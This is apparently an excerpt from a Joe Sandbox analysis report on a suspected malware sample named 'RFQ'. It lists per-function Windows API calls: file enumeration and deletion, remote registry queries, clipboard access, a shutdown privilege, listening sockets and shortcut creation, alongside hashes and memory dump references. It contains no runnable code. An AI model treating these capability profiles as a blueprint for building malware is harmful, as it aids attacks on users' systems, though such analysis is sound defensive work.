                                                                            • Opcode ID: 1910f79654e479782e117dfd805834c151242f9a873d30a9ffc7dcdea38f019a
                                                                            • Instruction ID: efe6f0a4915f985111fa873e25ab3e75c2f38f7fbe528ec8b52bc2759c313b55
                                                                            • Opcode Fuzzy Hash: 1910f79654e479782e117dfd805834c151242f9a873d30a9ffc7dcdea38f019a
                                                                            • Instruction Fuzzy Hash: 20D16DB2508304AEC350EFA4C885EBBB7EDAF88704F40491DF585D7291EB75DA48CB66
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006F9581
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006F95BF
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 006F95D9
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006F95F1
                                                                            • FindClose.KERNEL32(00000000), ref: 006F95FC
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006F9618
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F9668
                                                                            • SetCurrentDirectoryW.KERNEL32(00746B80), ref: 006F9686
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F9690
                                                                            • FindClose.KERNEL32(00000000), ref: 006F969D
                                                                            • FindClose.KERNEL32(00000000), ref: 006F96AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: 5312a1677a95fe26215117b5250fc3b8fc8f1b5408ef01a75726a51d6b8d2c1f
                                                                            • Instruction ID: c35a4a01ac298f3282212c9334020006530f65135edcf67aa1589e7d8b90d68c
                                                                            • Opcode Fuzzy Hash: 5312a1677a95fe26215117b5250fc3b8fc8f1b5408ef01a75726a51d6b8d2c1f
                                                                            • Instruction Fuzzy Hash: EC31C37164021D6BEF25EBF8DC08BEE33ADAF46320F108165F955E21D0EB79DD458A28
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                            • API String ID: 0-4052911093
                                                                            • Opcode ID: a7387e2a6b511afb507444f3131057a801831e6f089bbfd856feece82a81ec1e
                                                                            • Instruction ID: c4f7babc13637dd76a3430f915153fe77c55cf76c9ecf1193ba78c75faf5d92d
                                                                            • Opcode Fuzzy Hash: a7387e2a6b511afb507444f3131057a801831e6f089bbfd856feece82a81ec1e
                                                                            • Instruction Fuzzy Hash: 8E727D71E002199FDF64CF59D884BEEB7B6AF84310F14816BE805AB395EB749D818B90
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006F96DC
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006F9737
                                                                            • FindClose.KERNEL32(00000000), ref: 006F9742
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006F975E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F97AE
                                                                            • SetCurrentDirectoryW.KERNEL32(00746B80), ref: 006F97CC
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F97D6
                                                                            • FindClose.KERNEL32(00000000), ref: 006F97E3
                                                                            • FindClose.KERNEL32(00000000), ref: 006F97F3
                                                                              • Part of subcall function 006EDA03: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006EDA1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 8703fe1995c06f774407480f21d3fc7bdd8423595f345d1431271f2ec6867d85
                                                                            • Instruction ID: 686b8bf2e9f3fb666b21f998449f016db6af142931037ba2a082d95f3a0b7fb3
                                                                            • Opcode Fuzzy Hash: 8703fe1995c06f774407480f21d3fc7bdd8423595f345d1431271f2ec6867d85
                                                                            • Instruction Fuzzy Hash: 3E31D27154071D6BDB21BFA8DC48BEE33AEAF05360F208165F910A21D0DB38DE848E68
                                                                            APIs
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070BE65
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0070BED0
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070BEF4
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0070BF53
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0070C00E
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0070C07B
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0070C110
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0070C161
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0070C20A
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0070C2A9
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070C2B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3102970594-0
                                                                            • Opcode ID: ba692ca5e82f60e243537eeae192a74abf18fdbc92bf07d78845675fa1bdfad5
                                                                            • Instruction ID: f34fe2919a32865dbabc4d9cf89a71d1a69b51f5ff76019fbb5145e03185c690
                                                                            • Opcode Fuzzy Hash: ba692ca5e82f60e243537eeae192a74abf18fdbc92bf07d78845675fa1bdfad5
                                                                            • Instruction Fuzzy Hash: E4025970604200EFD755DF68C895E2ABBE5EF88318F18869DF849CB2A2DB35ED41CB51
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 006F8175
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006F8185
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006F8191
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006F822E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F8242
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F8274
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006F82AA
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F82B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                            • String ID: *.*
                                                                            • API String ID: 1464919966-438819550
                                                                            • Opcode ID: a0ac8d0c64c9841bb840e79797c1c6b2f733f9cdc963e63b7eeae532e10f12a2
                                                                            • Instruction ID: 88088ca37ac975e524c1fcf5b138d98fabdd2ffb58abcf4493662dd58aaccca7
                                                                            • Opcode Fuzzy Hash: a0ac8d0c64c9841bb840e79797c1c6b2f733f9cdc963e63b7eeae532e10f12a2
                                                                            • Instruction Fuzzy Hash: 2861BEB15047099FCB10EF60C8859AEB3EAFF89310F04895DFA89C7251DB31EA05CB96
                                                                            APIs
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                              • Part of subcall function 006EE0B7: GetFileAttributesW.KERNEL32(?,006ECEB3), ref: 006EE0B8
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006ED040
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 006ED0FB
                                                                            • MoveFileW.KERNEL32(?,?), ref: 006ED10E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 006ED12B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006ED155
                                                                              • Part of subcall function 006ED1BA: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,006ED13A,?,?), ref: 006ED1D0
                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 006ED171
                                                                            • FindClose.KERNEL32(00000000), ref: 006ED182
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 1946585618-1173974218
                                                                            • Opcode ID: d0a43fc62c175bd12b4779bd8906763666f97b62b6d29235c632a679cc9b86d0
                                                                            • Instruction ID: 50758d30624ffe4702438730d9735b00f84af7407dfd54fe8b92d05bc0335995
                                                                            • Opcode Fuzzy Hash: d0a43fc62c175bd12b4779bd8906763666f97b62b6d29235c632a679cc9b86d0
                                                                            • Instruction Fuzzy Hash: 9B616F3180228DABCF41FFE1CA569EDB77AAF15300F244169E40277292EB755F0ACB65
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: af37178ba6dfea0002142cca502d792ef561f371025e0226da168d2d62388922
                                                                            • Instruction ID: 2b311bc611c8b3a2abd44e4e1575e59a8bd9a8f2783bbcbaa253fcab142a04e2
                                                                            • Opcode Fuzzy Hash: af37178ba6dfea0002142cca502d792ef561f371025e0226da168d2d62388922
                                                                            • Instruction Fuzzy Hash: D341CE31204601AFE321DF58D888FA97BE2EF44318F14C498E5158BBB2C77AEC42CB94
                                                                            APIs
                                                                              • Part of subcall function 006E1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
                                                                              • Part of subcall function 006E1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E167E
                                                                              • Part of subcall function 006E1607: GetLastError.KERNEL32 ref: 006E168E
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 006EE850
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                             • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-3163812486
                                                                            • Opcode ID: 4f622adadfa918196431c0a6dad30635b13ea72deec2e493549efe4dfe3178d3
                                                                            • Instruction ID: 887e74b7d381d72c6d3397738f3a9a39f99fe83a7629b04ae230196431e075dd
                                                                            • Opcode Fuzzy Hash: 4f622adadfa918196431c0a6dad30635b13ea72deec2e493549efe4dfe3178d3
                                                                            • Instruction Fuzzy Hash: 8C0126726523606BF72422FA9C8ABFB725DDB04341F148525FC02E21D1DA669C0081A8
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 0070119D
                                                                            • WSAGetLastError.WSOCK32 ref: 007011AA
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 007011E1
                                                                            • WSAGetLastError.WSOCK32 ref: 007011EC
                                                                            • closesocket.WSOCK32(00000000), ref: 0070121B
                                                                            • listen.WSOCK32(00000000,00000005), ref: 0070122A
                                                                            • WSAGetLastError.WSOCK32 ref: 00701234
                                                                            • closesocket.WSOCK32(00000000), ref: 00701263
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                            • String ID:
                                                                            • API String ID: 540024437-0
                                                                            • Opcode ID: 876ae968cdd3f2d1247f201d8915e6ade6ea423231c95ec79b03d1857cc6c62f
                                                                            • Instruction ID: 75380e3e459b686337c2aa9641c4c0cdf396cd99102ccace752985d6da27007f
                                                                            • Opcode Fuzzy Hash: 876ae968cdd3f2d1247f201d8915e6ade6ea423231c95ec79b03d1857cc6c62f
                                                                            • Instruction Fuzzy Hash: 06416D31600104DFD715DF68C488B69BBE6BF46318F58C298E9569F2D2C775EC81CBA1
                                                                            APIs
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                              • Part of subcall function 006EE0B7: GetFileAttributesW.KERNEL32(?,006ECEB3), ref: 006EE0B8
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006ED33E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 006ED38E
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006ED39F
                                                                            • FindClose.KERNEL32(00000000), ref: 006ED3B6
                                                                            • FindClose.KERNEL32(00000000), ref: 006ED3BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 99f53362bf0c8eb88ec145f1352b548846b5dc615ff4f75453a25114afaff505
                                                                            • Instruction ID: 4d9a6608f7f937f855222c4f83e990cfe44bbb31e6f1b84236262aedb5886825
                                                                            • Opcode Fuzzy Hash: 99f53362bf0c8eb88ec145f1352b548846b5dc615ff4f75453a25114afaff505
                                                                            • Instruction Fuzzy Hash: D631A2310093859BC341FFA4C8958EF77EABE92310F444A1EF4D1921D1EB60DA09C767
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: __floor_pentium4
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 4168288129-2761157908
                                                                            • Opcode ID: e8a4d5bb67f22dc4ae1f068d88577b74c3d7b7303b10e15bcd53e94d1beaf7b5
                                                                            • Instruction ID: cca51231bad4ea8e179672cd30c593faf0f853abf1b7def505c75cd67901295f
                                                                            • Opcode Fuzzy Hash: e8a4d5bb67f22dc4ae1f068d88577b74c3d7b7303b10e15bcd53e94d1beaf7b5
                                                                            • Instruction Fuzzy Hash: 72C238B2E086288FDB65DF289D407EAB7B6EB44304F1441EAD84DE7251E775AEC18F40
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 006F63FA
                                                                            • CoInitialize.OLE32(00000000), ref: 006F6557
                                                                            • CoCreateInstance.OLE32(0071FD14,00000000,00000001,0071FB84,?), ref: 006F656E
                                                                            • CoUninitialize.OLE32 ref: 006F67F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            • Opcode ID: aebc3f410b69fa2ec77b569139d958ed5a1194e16954b7adadecde4ba915b2cd
                                                                            • Instruction ID: b601e5fbdf6b113e1d750fbaf934456bdf24ecdf06d638486ae06365c5267594
                                                                            • Opcode Fuzzy Hash: aebc3f410b69fa2ec77b569139d958ed5a1194e16954b7adadecde4ba915b2cd
                                                                            • Instruction Fuzzy Hash: FFD15771608205AFC354EF24C881DABB7EAFF89704F40892DF1958B2A1DB71ED45CB96
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 006F9A96
                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 006F9BA9
                                                                              • Part of subcall function 006F3792: GetInputState.USER32 ref: 006F37E9
                                                                              • Part of subcall function 006F3792: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006F3884
                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 006F9AC6
                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 006F9B93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                            • String ID: *.*
                                                                            • API String ID: 1972594611-438819550
                                                                            • Opcode ID: 522c5b19e6162dfb4f613dac559b3a3a2603e3493159f00bf4a9577bf3bc1a67
                                                                            • Instruction ID: e185128de9ab217985519e0a3fadb439f6ddcf0d678b47f2e178d1d634bb721a
                                                                            • Opcode Fuzzy Hash: 522c5b19e6162dfb4f613dac559b3a3a2603e3493159f00bf4a9577bf3bc1a67
                                                                            • Instruction Fuzzy Hash: 3641B17190420EAFCF55EFA4CC49BEE7BB5EF05310F20415AE905A2291EB319E45CF61
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0069AECE
                                                                            • GetSysColor.USER32(0000000F), ref: 0069AFA3
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0069AFB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$LongProcWindow
                                                                            • String ID:
                                                                            • API String ID: 3131106179-0
                                                                            • Opcode ID: 11b1fe257e1ad105f42f366c4f4debed14ef68bc5c64e61a51f2287aafe41ae4
                                                                            • Instruction ID: 5fb5046f7f7e0d6993a5748f342e3fbca816167bd6afe16f0ff21bdd0f5659e8
                                                                            • Opcode Fuzzy Hash: 11b1fe257e1ad105f42f366c4f4debed14ef68bc5c64e61a51f2287aafe41ae4
                                                                            • Instruction Fuzzy Hash: 04A1D5B0505104BEEF299AAC8C5CEFB369FDB42341B15811AF502C7B91CA299D46E2B7
                                                                            APIs
                                                                              • Part of subcall function 00702F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00702FA1
                                                                              • Part of subcall function 00702F75: _wcslen.LIBCMT ref: 00702FC2
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00701784
                                                                            • WSAGetLastError.WSOCK32 ref: 007017AB
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00701802
                                                                            • WSAGetLastError.WSOCK32 ref: 0070180D
                                                                            • closesocket.WSOCK32(00000000), ref: 0070183C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
